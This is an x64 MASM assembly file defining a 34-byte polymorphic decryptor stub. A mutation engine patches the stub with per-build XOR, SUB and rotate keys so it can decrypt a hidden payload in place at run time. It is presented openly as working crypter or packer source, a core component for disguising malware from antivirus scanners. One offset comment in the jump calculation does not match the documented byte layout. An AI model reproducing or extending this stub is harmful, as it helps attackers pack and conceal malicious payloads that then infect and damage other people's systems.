; ==========================================================================
;  DecryptorStub.asm – Polymorphic Decryptor Template
; ==========================================================================
;
;  NOTE: Code defined as raw bytes (db) to avoid JMP trampoline
;  problems generated by MASM linker. MutationEngine copies
;  bytes from DecryptorStubBegin to DecryptorStubEnd.
;
;  Calling convention: Windows x64 __fastcall
;    RCX = pointer to payload buffer (passed by Stub.cpp — no RWX needed)
;    EDX = payload length (hardcoded in template, patched by MutationEngine)
;
;  Template format (34 bytes):
;  [0..4]   mov edx, imm32         (5B) – payload length (placeholder: CCCCCCCC)
;  [5..7]   xor r9d, r9d           (3B) – zeroing index
;  [8..11]  mov al, [rcx+r9]       (4B) – loading byte
;  [12..13] xor al, CC             (2B) – decryptor step 4 (XOR key4)
;  [14..15] sub al, CC             (2B) – decryptor step 3 (SUB key3)
;  [16..18] ror al, CC             (3B) – decryptor step 2 (ROR rotBits)
;  [19..20] xor al, CC             (2B) – decryptor step 1 (XOR key1)
;  [21..24] mov [rcx+r9], al       (4B) – storing byte
;  [25..27] inc r9                 (3B) – incrementing
;  [28..30] cmp rdx, r9            (3B) – comparing
;  [31..32] jne loop               (2B) – loop jump
;  [33]     ret                    (1B) – return to Stub.cpp
;  Total size: 34 bytes

.code

; We use ALIAS to ensure MASM does not add prologue/epilogue
OPTION PROLOGUE:NONE
OPTION EPILOGUE:NONE

PUBLIC DecryptorStubBegin
PUBLIC DecryptorStubEnd

DecryptorStubBegin PROC
    ; === BLOK B (5B): mov edx, imm32 ===
    ; RCX (payload pointer) is passed by caller — no lea rcx needed, no RWX needed.
    db 0BAh, 0CCh, 0CCh, 0CCh, 0CCh

    ; === BLOK C (3B): xor r9d, r9d ===
    db 45h, 31h, 0C9h

    ; === DECRYPTION LOOP ===
    ; mov al, [rcx + r9]
    db 42h, 8Ah, 04h, 09h
    ; xor al, 0CCh (KEY4)
    db 34h, 0CCh
    ; sub al, 0CCh (KEY3)
    db 2Ch, 0CCh
    ; ror al, 0CCh (ROT_BITS)
    db 0C0h, 0C8h, 0CCh
    ; xor al, 0CCh (KEY1)
    db 34h, 0CCh
    ; mov [rcx + r9], al
    db 42h, 88h, 04h, 09h
    ; inc r9
    db 49h, 0FFh, 0C1h
    ; cmp rdx, r9
    db 4Ch, 39h, 0CAh
    ; jne loop_start (rel8 = target - (jnePos+2) = 15 - 40 = -25 = 0xE7)
    db 75h, 0E7h

    ; === END: ret ===
    db 0C3h

DecryptorStubBegin ENDP

DecryptorStubEnd PROC
    nop
DecryptorStubEnd ENDP

END
